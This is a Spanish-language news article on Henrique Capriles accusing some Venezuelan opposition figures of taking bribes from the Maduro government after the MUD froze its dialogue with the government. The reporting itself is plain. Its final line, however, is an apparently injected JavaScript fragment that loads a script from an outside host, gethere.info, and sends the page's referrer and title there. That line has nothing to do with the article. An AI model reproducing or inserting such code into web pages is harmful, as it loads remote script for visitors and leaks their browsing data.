Destacados Nacionales

Capriles “acusó a algunos opositores de recibir sobornos del chavismo”

El fallido diálogo en Venezuela acentuó aún más la crisis política que atraviesa el país. Este miércoles, el gobernador del Estado de Miranda, Henrique Capriles, realizó una fuerte denuncia al acusar a algunos miembros de la oposición de recibir sobornos por parte del régimen de Nicolás Maduro a cambio de información.

“Eso que dicen que tienen (el gobierno) gente dentro de la oposición que les informa, yo creo que sí es cierto. Gente que se dice del cambio y recibe dinero de ‘boliburgueses’ (apelativo para oficialistas adinerados)”, disparó el líder opositor.

La denuncia de Capriles tuvo lugar luego de que la Mesa de la Unidad Democrática (MUD) congelara el diálogo iniciado con el chavismo el pasado 30 de octubre, con el acompañamiento del Vaticano y la Unión de Naciones Suramericanas (Unasur).

La MUD tomó esa determinación el martes –que no implica la ruptura de las conversaciones– justificando que el régimen ha incumplido lo pactado en cuanto a una salida electoral a la crisis y la liberación de opositores presos.

Capriles, cuyo partido toma parte en la negociación, anunció que pronto dejará al descubierto con “nombre y apellido” a los políticos que según él están pagados y negocian “tras bastidores” con el chavismo.

La MUD “en su proceso de reflexión también debe ir acompañada de un proceso de depuración, es absolutamente necesario”, señaló el ex candidato presidencial.

 Si bien defendió a los delegados de la MUD en las negociaciones con el régimen, sostuvo que el diálogo ha sido “muy mal manejado, muy mal comunicado”, y repudió que no se hayan visto resultados.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;